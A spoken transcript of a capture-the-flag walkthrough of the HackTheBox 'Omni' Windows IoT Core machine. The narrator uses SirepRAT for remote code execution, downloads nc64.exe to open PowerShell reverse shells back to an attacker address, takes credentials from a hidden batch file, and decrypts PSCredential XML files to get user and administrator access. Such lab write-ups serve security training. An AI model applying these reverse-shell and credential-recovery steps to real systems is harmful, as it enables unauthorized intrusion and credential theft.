Welcome back, everyone. I am excited to be back. It has been almost a month since my last recording. So this has been a great holiday time to get away from everything. One of my instructors from SANS that I had, he did Sec 504. I was able to facilitate his class. Michael Murr really put it one way. It's hard for me sometimes to step back and think about it this way, but on your deathbed, no one is going to wish they had more time playing with Netcat. It's just not going to happen. So make sure to take a little time away, get away from some of this stuff. But also when you have free time like this, if you had a break over the holidays, dig into some of this stuff. Just make sure that you keep a balance. That way it continues to be fun. When it stops being fun and becomes not just work, but like painful work, hard, you'll get burned out. So I just welcome back from the holidays. And I'm excited to get back onto this box. This one is Omni. Omni is an easy box. Unfortunately, though, it's hard and easy at the same time. It is hard, or at least it was hard for me to find some of these things because I'm not familiar with IoT. But the things that they injected in this box were super easy. There's going to be one. I say it's not a CVE. I could not find a CVE number associated with it, but remote code execution on Windows IoT. Core, so you're able to get system access from a portion of the Windows IoT management on the portal. And then the rest of it is PowerShell. I've tried so many different things. There's so many weird things that came up in this box. And a lot of the reverse shell tricks, techniques didn't work because it is Windows IoT. So it's an embedded version for those Internet of Things devices. It becomes a little bit pared down, and those pared down features are some of the things that you take advantage of when you're trying to do some of the other Windows boxes. So that part got me frustrated, just trying to find the right way to work it. So in order to do that, you're really going to need a browser. We'll talk about SirepRAT in a little while, but that is the Python code that was developed for this RCE. And then you're going to need specifically NC Netcat 64. You're going to run into some error messages. I'll go ahead and show them to you, but we're going to push through right after that and just start using Netcat 64, get our reverse shell, and then you're going to be playing around with users, bouncing between different users. That way that you can decrypt different files. And you're going to decrypt the passwords that are saved off into files by using Import-CliXml. So you're allowed to use PSCredentials and save them off into a file, and then it uses a key structure so that only the person that saved it can use it. So we'll have to bounce back and forth between a couple different users, but we'll be able to import those XML files, and then I'll show you how to spit out the plain text passwords. That's it. It is not difficult once you know how to do it, but like many boxes, it can be foreign and confusing and annoying. and as such, this box was rated at 3.2. It was rated pretty low. And I think that ties back to there were only 5,000 owned. Between system and user, there's maybe a 40 difference. But overall, it was around 5,000 people were able to conquer this box. So I'd like to show you how I was able to do it, and we'll break it down. So let's get started. And as always, we'll kick off with an NMap. So NMap 10, 10, 10, and then this box is 204. This one will come back pretty quick, not too bad. Let's just double check. It was up earlier, but we can do skip the ping, the discovery, and see if it'll come back up. All right, so this one came up 135 and 8080. So 135 is going to be your RPC remote connection kind of stuff for Windows services. And then 8080 we'll get into. It looks like HTTP proxy, but it will be the website. So let's go ahead and take a look at that. The first thing this is going to do is it's going to come up and say it's requesting username and password. The site says Windows Device Portal. So I wasn't really familiar with this. Easiest thing to do, Google it. So it's catching me here. So we'll go ahead and Google it here. All right. So it is the Windows Device Portal. It's a web server for different IoT specific devices. HoloLens on the PC, some other items. But I don't know if you noticed it when I clicked on that, you really saw this. So there's obviously something out here. We'll go ahead and take a look at exploit. And the first thing comes up is SafeBreach Labs. SafeBreach Labs is the one that wrote this code for SirepRAT, and it takes advantage of the SirepRAT test service. We'll go ahead and click on that GitHub. So it's a full rat capabilities. You don't have to write any malware, and it takes advantage of HL key setup and some of the T-shell, Sirep, WPCon, and it just gives you remote code access. And it's kind of sad, but it's super easy. It allows you to download files. A lot of this is actually downloading the text. I had a few issues with some of these files when I tried to pull down XML and things like that. It just didn't necessarily work for me, but I was able to upload a file, and then you can run arbitrary programs. And this is what we're going to work on most of the time. Is launch the code with an output. So launch a code and then get an output back. And then as you see, it says return output. So let me see what came back from that command. And then you'll be able to say command and then put it in there. Now, while you're doing that, if you want to run any kind of arguments, like if you're going to run command and then another command, you can do a /c inside the arguments. So we'll be rerunning commands until we get a better interface. This one was really helpful. Get system information. You'll see this, one of the commands that was pared down was system info. Couldn't find system info, but this command right here was able to go pull that information from the files. So when in doubt, just do a SirepRAT tac help. So we'll pull this down, just copy this, and we will go to our op directory and clone it in there. This is generally how I use things, and if it's a handy tool, I'll go ahead and save it and keep it. Sometimes I'll wipe these boxes, sometimes I'll hang on to them. So it's just on how useful that tool is. This is a very specific tool, but in the meantime, we'll go ahead and use it. So go into SirepRAT, and then we'll take a look. And there's the requirements, the setup. Just follow these directions that were provided. You can just do a pip install requirements and then start running it. So pip install tac r requirement. And it's going to do hex dump. Hex dump was a big thing that wasn't included in this version of Parrot, apparently. All right. So, my bad. We need to do a Python, SirepRAT, and help. And you're going to see that there's an issue. I said we installed hex dump. What we did, I should be able to scroll up, is we installed HexDump 3.3 on Pi 3. So it's another one of those issues between the different versioning of Python. But if we just come up here and run it as a Python 3, this one runs with no modifications required. I was really happy about that. So you'll be able to run this, and you just need to do positional arguments. So putting in the IP address and then the commands you want to run. Like I said, you can say as logged on user, you can impersonate somebody else, you can put in the arguments, you can set a base directory from where you want to kind of start, and then remote path. If you're targeting anything specific, especially if you're trying to pull down a file, you're going to have to put in the remote path. And then data that you want to write to the file if you want to write specifically. One of the commands that you're going to have to get familiar with is verbose. So if it's printable, print result. And I'll show you here in a minute what that looks like. So with Python 3, SirepRAT, we're going to say 10, 10, 10, 204. And then I'll just start with get system information. I think that's the main command right there. Okay, so we'll do get system information from device. And it kind of came back a little garbled, but you're going to see that this is major version 10. So it's Windows 10, minor version 0. It's going to be build 17763, which is going to be your version 1809. It came out in 2018. It's not the new hotness anymore. So it's really down to limited support at this point. So this vulnerability, I'm not sure if it got patched in the version, but it should have been. Without a CVE, I couldn't really track it down and find it too well. So we've got some basic information. Let's go ahead and start pulling some information off the device by giving it commands. We'll start really basic. So we'll come back here and say CMD. Actually, it needs to be TAC-CMD. And then everything in here in their examples should have included quotes. So cmd.exe, and then we'll do args, and we'll just start with something basic. So C hostname. So it should have been launch command with output. So I missed that part. So we'll come back in here and put it in, telling it what we're trying to do, and then we give it the command, and then we give it the arguments. And this one did not come back with information. It does say it came back with a payload length of 4. I just want to try one thing and add that verbose. TAC-B. So when it's something printable, it'll show up right here. So right now we are not getting it to process the host name information, which is kind of weird. Let's see if we can do, it's a TAC-C, and then just do task list. Nope, that's not working. So I did forget one function. It's not listed up here in the help. Yeah, so it's this one, the return output. Got to remember to tell it, give me back the output. Because right now we're running these commands, but we're not seeing anything come back. So tac return underscore output. So again, Python, the command, IP, what we want it to do, launch command with output, give me the return of the output, run the command of command.exe with the argument of task list. We'll go ahead and change this back to host name, just to be easy. And you see that it prints out Omni here. Now it prints it down here in this, and you'll see it says a payload peek, just a little peek into that payload. So if I take a V off, it'll run the same thing. What you won't see is this information right here, but it will still be down here. So with bigger payloads, it actually disappears because you're only getting a peek at the beginning of the payload. So you got to make sure to put the TAC-V in there if you want to see something. So if I want to see, we'll do netstat A&O, and we'll do it without the V, and you'll see it only gives you so much back. So it's going to say active connections, local address. It's the header field, and then after that you don't see anything else. But if you come back in here, give it a TAC-V, then you get the full output, and you can take a look. So we can see all the different things that are running. There's a couple other system addresses that are available, but they didn't come up in our initial scan. No big deal. I think we got everything that we need. So we're still looking at 135 and 8080. And 8080 has provided us the opportunity to get this. This is now getting remote code execution. I kind of like doing a little bit of this. I'll just do sudo tcpdump. This is something that I like to do just to confirm that I have connectivity. So I'll do it on tunnel 0, and then I say I just want ICMP traffic. And this just allows me, when I run a command over here, I can run, we'll run just a ping. So ping 10, 10, 14, and I'm on 36 right now. And you see that I'm pinging through, and I'm also seeing the replies back on both sides. So they're both working. So that's great. We know that this is fully functioning. So this would be a great time for me to go to my var www and start up my HTTP server. And I like to do that through Python 3. Module HTTP dot server, and then we'll give it a port 80. Cool. And we'll leave it up for right now because we're going to try a few different things. I don't exactly know where I'm at. So if I do a dir, there's a lot of files in there. Tons of files. And I'm going to make this big just to make it easier to look at. So it's definitely all the Windows files. It's a good chance that we're sitting inside of System32. It is big. And sure enough, we're in C Windows System32. Don't want to be there. Let's try and do a directory for C BES. And I'm going to show you here one of the issues that I ran into as well. If you do a slash on a quote, it's going to treat it like an escape character. So just a little bit of a bummer. Just make sure to put in double slashes, or you can take them out in this case. So when you're trying to show a directory, you can just leave them off and it won't run into an issue with a double quote. I didn't like that at all, did it? Let's try the slash slash. Okay, so I guess you do have to put the slash slash on there, so just remember that. And you're going to see that there is a folder called reconfig, one called data, strange little junction thing. This one was started in 2020, so that looks a little suspicious. The Windows was started in 2020. And then you've got program files, programs, system data, users, all that information. So I want to go and try and take a look at users. And right now I'm just seeing public. And when you do that, you see default and public. So we'll go ahead and take a look at public. And there's nothing sitting up in public. So one of the things I like to try is to write it. So we'll just say echo hi into C users public test.txt. So it runs that command, and then we can arrow up and just say look at the directory, and there is a test.txt in there. And if I want, I can just do type C users public / test.txt. So we're able to see that. One of the other things you could do is if you take that, if we do a help, yeah, we'll be able to see one of the other options is to get file from device. So if I say get file from device, you see it right here in this code. You got to give it the file name under / remote path or --. So we'll play around with that just to show you some of the other commands that are available through this program. So get file from device. We don't need any of this information. And then we'll just back it up to here and we'll say remote _ path. And I believe we can leave the double slashes out because we're not sitting inside of a double quote. We don't have to worry about that. take out the help and run that. So I still left this double quote. Got to take that off. So again, I didn't get anything on this one. This is kind of some of the oddities. I can try and put in return output, maybe. See if that makes any difference. Nope. But there's something. There's a little small payload. But we know that when we went ahead and just did a standard type, so ran our own command, came back and said hi. And it actually didn't mind this single quote here, even though we had double quotes here and a single quote here, it still worked. So no worries there. All right, so we've been able to test that we can ping back and forth between the box. We can write a file. We can read a file. So this is a good place that we can drop files. So if we want to try and put in our reachback tools, we can do it from here. So we'll go ahead and start with some PowerShell. See if we can get that working real quick. Before we step, you always want to try and double check that all the processes, all the steps work. I'm going to leave the cmd.exe and do a /c here and then run PowerShell, because sometimes you'll have some issues if you don't. So we'll do a PowerShell and then maybe it'll give us hostname now. So it did. So it ran the PowerShell command, and then inside the PowerShell it ran hostname, came back Omni. So we can see that that's working. If we don't run a hostname and we just leave it PowerShell, it should actually kick out, yeah, the headers for Windows PowerShell. Here's the command prompt, and then it dies out. So kind of nifty, but now we got PowerShell running. We can play around with some transfer tools such as IWR. We'll do a web request and we'll give it the URI, which is 10.10.10 or 10.10.14.36. And it's on 80, so I don't have to worry about that. And then the file that I want to pull down, I'll pull down nc.exe first just to show you, and then we'll say out file. And the out file here is going to be C users public, and then we'll put it into nc.exe. That should be good. And I'll just come up here to make sure that it's sitting in that folder, and you see that nc.exe is in that folder. So we can come back in here and just say run that. And I'm going to run that and try and reach back to 10.10.14.36. We'll do this on 9999 and give me a PowerShell back. Pretty standard reverse shell. I'll bring that other window back up real quick. And I like to use r.bat, which allows you to do arrow keys up, down, bring up your history, some extra features. So always think about that if you have a moment. It's going to make it a more robust shell when you're just using basic stuff. So we'll do that. And then I said we're going to do it on 9999. So it's listening. And we've got all this information in here. PowerShell, run nc. This is my IP, my port, and I want you to give me a PowerShell window. The problem that you run into is it says native command failed, resource unavailable, application failed exception. It's got all these issues, and it says specified executable is not a valid application for this OS platform. They removed some capabilities that you're not able to run this version of Netcat. And then I also tried NCAT, which didn't work. But if we say, I want to take a look at some of the environmental variables. So we'll see what this system looks like. We'll definitely come back to this command in a little bit. So if I say GCI, so get child item, so it should get anything below not necessarily the content, but it's going to get the items. And we're going to say, yeah, give me anything in the environmental. And it's going to kick out all the environmental variables. So it's another way to get your information if you're limited on access. So we can see here's the app data. So there's a couple files here that are in C data program data, C data users. Okay, here's your program files, pretty standard. Omni is our computer name. More local app data. There's 4 processors. It's running NT. AMD 64. It looks like it's got x86 things, but it just doesn't seem to want to work. So we're going to go ahead and retry this command, and we'll go ahead and just change it to NC64. I've got a copy of that, and we'll pull that down. And we'll just take a look at the folder and make sure it's there. So NC64 is in. And there's our command that we ran before. We'll just add a 64 here. We'll pop back over here and you see the shell is coming up. It's a little slow. All right. I try a few commands. So we'll get our host name. Actually, just run host name. If I say echo, I'll show you the who am I. So you try to use a normal who am I, and that is one of those commands that was stripped out of the system. So if you come in and do an echo pound percent username, let's try that same thing. GCI env colon. You're gonna see the computer is Omni, and the username is Omni $. So we're a weird special account because this one was an exploit that got you system, but it's not the right system. I'll show you that here in a little bit why. Well, we've gotten our foothold into the box. It's a lot easier to work from this PowerShell. It's a fully functioning PowerShell. Let's see if we can find some files. Since we're here, I'll go back to the C. We'll do a dir, and like I said, there's a users, but then there's also a data. There's some other things. Let's go into data. Data, and then we'll go into users here. So there's administrator, there's app, there's default account. Let's try a few things. One of the things that I was able to use was GCI. So get child item. So you're going to find all the items that are in those folders. I'm going to give it a path, which I guess I don't need to give it a path now. When I did it before, I was doing it from that old shell where you had to specify every single folder that you were trying to access, but it should be able to do it from this folder going down. I'll go ahead and put just a dot just to say this directory. And we'll tell it to include certain things. So include r.bat. I'm really trying to find user.txt as always. So we'll say recurse so that it goes into the directories below. And I like to use force in case it's hidden. So if it's a hidden file, you need to use force. Did not like this. Must be the order in which I did it. I guess I needed to say path. If I was going to put the dot there. And attack. There we go. Okay, so here's all the text files that are inside of here. There is a user's administrator with a root.txt and a user.txt and a hardening.txt. And this is inside user app. Okay. We'll just go into app because I think it's a little early to think we can get an administrator. We'll list the stuff here. We have 3 files. There's one that's actually not a text file called IoT admin. So cat hardening, and we don't have permission. So we'll skip that one, cat user. And that comes out as a PSCredential file. So this is an XML format, PSCredential with a password here. So we'll come back over here and I'll show you Import-CliXml. And we're going to decrypt the password. And Travis Gann has a pretty good write-up if you want to take a look at it. Kind of just explains that these are the commands. So if you want to make an account, if you want to convert a plain text password into a secure string, this is how you would use PSCredential passing credentials from command line if you're on a box and you're just trying to leverage that box as a jumping off point using somebody else's credentials you've already harvested. It's a pretty cool technique. It doesn't come into play in this box, but it's a great technique that I'd love to show if it comes up again. As you come down, it tells you how to store an encrypted password into a file, and that is a matter of converting to secure string, convert from secure string, put it into an out file called encrypted.txt, and that puts that in there. And then you can decrypt. Now this is based on putting just a straight up password that's encrypted into the file, but what we're dealing with is actually the XMLs. So here's where it allows you to store an encrypted password in a file using Import-CliXml. So it'll kick it out into this file, and then to pull it back in, you just have to say user.cred, or any variable you want to call it, Import-CliXml, and then you give it the path of the file. There's a lot of information about here to get the WMI object. There's an easier way down here, which is just give it that credential, give it that variable, and then just say get network credential, and then give me the password. You can say get network credential, and it'll give you all the information that is in that PSCredential, and in this case, it'll give you the username and the password. But if you just want the password, you can say password. So this is what we're going to try and mess around with here. The first thing is to try and convert it over. So we'll pop this window back up, and I'll just put it off to the side so we can see what we're doing here. So we have an XML that's IoT admin, and we have an XML that's user.txt. So we'll try user.txt first. So I'll say user equals import CLI.XML, and then the path, I'm not really going to specify too much, // and then we're going to try user.txt. And it's going to come back with this big error. So just to show you, it says the error occurred during a cryptographic operation. And this is where it's reaching into the private keys for that user, but this user is Omni $. It has no credentials. It has no keys stored. So we're not going to be able to do that. We're not going to be able to pull it because this is still not the right user that secured this file. I'm going to go ahead and try IoT admin, and we'll talk about that. So IoT admin .xml. So it came back with the same problem. We're just not going to be able to get into that. How do we get into the right user? We got to find some files that we are able to access. So let's go back to C. Let's try program files. See if there's any applications. There's one. So we'll try GCI force just to see. There's Windows apps and Windows PowerShell. So let's try Windows PowerShell. Okay, we'll do a GCI force here. Okay. and then GCI force again. So we have 4 different folders. Again, what I said earlier was look for some of the suspicious stuff. This one's 2020, whereas the rest of them are 2018. If these are system files or when it was set up by the creator, these are the things that haven't been touched in a while. Usually not too big of a deal, but with HackTheBox, look for some of the things that are more recent. So we'll go ahead and try package management. And GCI force. And there's a folder, and then there's r.bat. And this one is the 2020 file. You'll see that this is a H. So that's one of those things. If I just did a dir, we completely would have missed that one. So it's important sometimes that you look for those hidden files. So now's a really good time to go ahead and take a look at what's in that bat file. So type r.bat. And it's a batch file, echo off. We're going to do loop for everything in, so every person in net local group administrators, do net local group administrator delete. So, all right, take them out. And then there's a couple credentials here, net user for app, net user for admin. This is a wonderful password, Internet of Things. And then it does a ping, and then clear screen, and then go back to loop, exit. So big thing here is obviously the credentials. We don't really have a good way to change users. We don't have a good way to add users, but where do we have a good way to try and use credentials? And that's going to be back on 8080. So we'll go back here, see if we can refresh it, and it pops up. Cool. We'll try app first. App. And we're in. So this is a Windows 10 IoT core test image designed for prototyping only. If you're looking to commercialize, use a custom thing for optimal security, obviously. I'm not going to go into looking up these different versioning, but this is that 17763 I talked about. We know what version of Windows this is, and it's running some VMware. And we've got a couple things here. So apps manager, there's a couple apps running. File Explorer, oh, that's a great one. So if we go up to user folders, can't see what these buttons would have been, but I guess there's not much in this one, but you can upload files if that's something you want to do. Desktop INI. Don't really know where we're at, so we're just going to drop this for right now. Quick run samples. Here's a couple different applications, clients, processes, and it's a good way to look at the task list so you can see all the functioning applications. And you see that it's listing the NT authority, so it's definitely using some credentials to be able to pull this information. You can look at the performance of the system. And there's one here, oddly, it's called run command. All right, let's try it here. Echo username. So this is the username for app. All right, give me the host name. All right, dir, and that's your directory. If I say dir c users, you're going to see there's user public. Run that again. All right, so everything seems to be working. What if we tried to use our netcat to launch another shell? Our last shell was launched under Omni $. Maybe we can launch one here as app. So we can say run a PowerShell, and then I think I can do it this way. So we'll say nc64.exe, We're going to give it the box, and we'll make this one 8888. And I'll ask for a PowerShell again. And we need to go set up our receiver, something to catch with. I'll go ahead and just open a new tab. Oh, I killed this one. All right, so I accidentally killed this window. It's a perfect one. Go ahead and just relaunch in here as 8888. And kick it out. And we got a connection back. Just to double check, echo username. Man, it just does not want to run that function, but it ran it from that other window, which is kind of interesting. I wonder if I ran a command C, echo username. Yeah, so it's a little bit of a function between running a PowerShell versus running a command. No big deal. Let's do GCI and then the environmental variables. Take a look. Same kind of thing, data users, Omni, all that information looks good. And you're going to see that we are now username app. And our user profile is in C data users app. So now's a great time to come back to that folder and do a GCI force. We've got that next. We got that user text. We've got the hardening text. We've got IoT admin. Let's take a look at hardening. So cat hardening, and we're able to read it now because we are the right user. This is our user folder. So change default administrator password of p@ssw0rd. So they've changed this. So these are some of the steps they did to harden the system. So they've done that. They've added firewall rules to restrict unnecessary services. So I've cut back on some of the things. Obviously you saw when we did a netstat, not all the same ports match. And then they removed administrator account from SSH users group. Okay, so we're not going to be able to SSH into the box, but we need to find a way to get into administrator. Let's pivot it for a minute and try that user text by using some of those same commands that we ran before. So we'll just go ahead and come up here and grab them real quick. All right, so $user, and then we're going to use path user. We'll just copy and paste that down in here. And this time it ran. It didn't give us an error message. So using that information that we got from Travis, we're going to want to go ahead and just say get network credential password. Now here it's asking you to save it into a variable $sign password. I'm actually going to just straight up echo it because we just want to know what it is. So we'll say echo, and then this one was in variable user. It did not copy that. And that's our user flag. So we got our user flag, yay. All right, so we got our user flag, we've got our hardening. There's one other file that we weren't able to interface with, and that was the IoT admin. So let's go ahead and take a look at that one. And we'll just call this admin instead. And it's admin, it's actually IoT-admin.xml. And that one worked as well. So this was the user that exported that password. So we'll just come back up here and change this to admin. And that's the benefit of having r.bat. You don't have to type all this back in. And it's Internet of Things. So it's the same password information that we had before. We just found it through a different mechanism. So there's a couple different ways to kind of bounce through this box. Well, now we need to get into that administrator. I want to try doing it through here. One of the issues that I found was that it just will not release the credentials without closing it out. all the way. So I'll close this entire window out and close all the tabs. We'll start again. And we'll just come right back in to 10, 10, 10, 204, 80, 80. And we're going to say administrator, and then we'll come back over and grab this password. So we're back in as administrator. Let's try and go back to this, run a command and say echo %username %. Well, that says administrator. I like that. So we'll do the same thing that we did before. PowerShell C users public nc64.exe to my address 10.10.10.14.36 777 PowerShell. We'll come back over, make sure that we just do an r.bat and set it up on 7777. Lots of fingers everywhere. And run it. And you see it in the background catch, so we'll jump back over. And we can say like net user. So we know here it is. Here's who's should have been on the box. So we know there's an app, there's an SSHD. First time I ran this box, somebody had actually started up the SSH server. So it does function on here. And you can get an SSH key out of this box. I'm not going to show you how because it really doesn't matter. It's not the way into this box. It's just a nice little extra trick. So we will cmd/c echo username. And we are administrator. cdc data dir cd users administrator, and there's a root.txt there. So let's take a look at the root.txt using that same command we keep using. So I'll just copy this and we'll put our variables in. So we're going to call this one admin password. And it's going to be equal to, got too many equals, equal import-CliXml, and we're going to say root.txt. That's the right user for that one as well. So echo admin pw, and then we'll come back over again and just pull that get network credentials password. And that is the root flag. So that is it. That is the box. It's taken a little while to get there, but that's because there were some oddities in this box. I didn't even show you half the problems I had. But the reason this box was kind of rated a little bit lower by a lot of people was to get the user flag, to get the root flag, and to get the admin password for the IoT device were the same method. And that usually frustrates people. Now you had to find ways into the different users, but it was still the same method for user and root, where you went to the web portal, put in a password, went back under different credentials, opened up the PSCredential file, rinse, repeat, go back to the web portal and get admin that same way. So a little bit of a bummer there, but all in all, pretty nice box. I want to say thank you to Egress. Egress is the one that put this one together. It isn't easy, so don't take it too serious. It's just a nice box to try out a few different things. It is a different operating system, which threw me off for a lot of the other techniques, so I had to dig a little bit deeper into my toolbox. I also want to say congrats to Justin and Yevgeny. They were the winners. This is my 1 year mark of being in business and just sharing all these really cool experiences with you. So the two of them were able to win the social media contest I had going on. Justin's getting a YubiKey, and he's getting the book bundle from No Starch Press via Humble Bundle. And then Yevgeny got the Humble Bundle, and I am so appreciative of everybody that's watching, everybody that's supporting this. You can see all the information on there, how to get a hold of me on different platforms. You can find me at Parity InfoSec, InfoSec Parity, various different platforms. But you can always find me at www.parityinfosec.com. But for right now, take some time, take care of yourselves, and we'll see you again next time.